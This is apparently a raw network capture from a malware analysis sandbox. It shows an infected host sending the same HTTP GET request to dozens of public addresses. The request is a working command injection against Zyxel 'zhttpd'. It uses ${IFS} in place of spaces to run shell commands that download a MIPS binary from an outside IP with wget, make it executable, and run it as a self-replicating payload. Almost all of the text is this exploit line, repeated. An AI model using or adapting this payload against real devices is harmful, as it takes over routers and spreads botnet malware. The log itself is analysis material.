                                            Jan 14, 2024 15:50:49.628715038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7085192.168.2.2335632218.113.3.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628750086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7086192.168.2.2335508101.12.152.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628793001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7087192.168.2.235281067.99.133.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628837109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7088192.168.2.235985061.223.214.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628845930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7089192.168.2.2345584121.54.103.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628886938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7090192.168.2.235968241.46.205.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628895044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7091192.168.2.234110475.172.225.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628921986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7092192.168.2.234923269.33.237.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628948927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7093192.168.2.234339495.16.60.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628968000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7094192.168.2.2347334192.138.52.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.628982067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7095192.168.2.235562620.217.143.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629007101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7096192.168.2.23515449.34.202.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629030943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7097192.168.2.2337626135.207.137.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629034996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7098192.168.2.2360552189.150.66.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629074097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7099192.168.2.235037699.97.41.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629091024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7100192.168.2.233521637.240.255.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629126072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7101192.168.2.23472268.193.41.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629137993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7102192.168.2.235385441.124.146.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629151106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7103192.168.2.235506652.39.227.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629189968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7104192.168.2.2351188158.35.222.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629211903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7105192.168.2.235367218.55.184.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629226923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7106192.168.2.236006888.25.160.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629252911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7107192.168.2.2338546131.46.157.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629292965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7108192.168.2.2347910110.97.44.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629318953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7109192.168.2.233923453.67.147.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629358053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7110192.168.2.2358718193.11.4.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629410028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7111192.168.2.2354478210.105.47.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629420996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7112192.168.2.233889862.175.13.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629460096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7113192.168.2.2336284113.164.139.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629491091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7114192.168.2.2345476148.248.18.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629494905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7115192.168.2.2355044129.43.100.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629520893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7116192.168.2.2355676155.182.108.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629549026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7117192.168.2.2335534132.169.219.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629586935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7118192.168.2.234247258.168.140.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629615068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7119192.168.2.234694639.28.179.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629637003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7120192.168.2.2352240147.126.210.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629673958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7121192.168.2.2347178208.193.8.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629709005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7122192.168.2.2344424125.179.229.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629713058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7123192.168.2.2342372212.118.25.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629734039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7124192.168.2.235919058.58.90.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629776955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7125192.168.2.235978614.51.192.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629801989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7126192.168.2.233445039.69.184.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629828930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7127192.168.2.2340816148.249.248.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629859924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7128192.168.2.234999040.219.240.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629894018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7129192.168.2.235423864.176.15.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629910946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7130192.168.2.23416044.18.64.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629933119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7131192.168.2.233824824.40.245.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629965067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7132192.168.2.234826278.241.230.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.629986048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7133192.168.2.235592451.6.161.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630003929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7134192.168.2.2344522112.210.109.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630028963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7135192.168.2.235055827.51.254.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630065918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7136192.168.2.235617060.68.32.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630105019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7137192.168.2.2349936116.241.153.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630115032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7138192.168.2.2334572160.184.136.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630153894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7139192.168.2.2341948152.246.2.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630156040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7140192.168.2.233517043.194.115.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630193949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7141192.168.2.234318694.194.44.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630203962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7142192.168.2.235448297.128.135.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630261898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7143192.168.2.233511425.85.157.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630270958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7144192.168.2.2353066195.67.243.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630302906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7145192.168.2.2335008180.45.221.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630310059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7146192.168.2.2340944137.155.84.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:49.630347013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7147192.168.2.2340396177.232.224.202443
                                            TimestampBytes transferredDirectionData
